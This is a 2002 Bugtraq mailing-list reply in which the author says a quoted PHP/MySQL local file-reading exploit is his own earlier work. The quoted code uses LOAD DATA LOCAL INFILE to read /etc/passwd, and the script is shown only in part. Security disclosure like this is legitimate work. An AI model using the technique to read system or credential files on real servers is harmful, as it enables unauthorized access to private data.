[28043] in bugtraq
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
daemon@ATHENA.MIT.EDU (Dave Wilson)
Thu Nov 28 11:42:40 2002
Date: Wed, 27 Nov 2002 09:54:58 +0000
From: Dave Wilson <dw@botanicus.net>
To: Hai Nam Luke <hainamluke@hotmail.com>
Message-ID: <20021127095457.A811@africa.datactics.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021126105752.20267.qmail@mail.securityfocus.com>
Hi there,
Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.
On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser,
> $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl
> = 'A'.time
> ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO
> TABLE
> $tbl FIELDS "
> . "TERMINATED BY
> '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );
Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).
> Luke (HVA)
> http://www.hackervn.net
Dave Wilson.
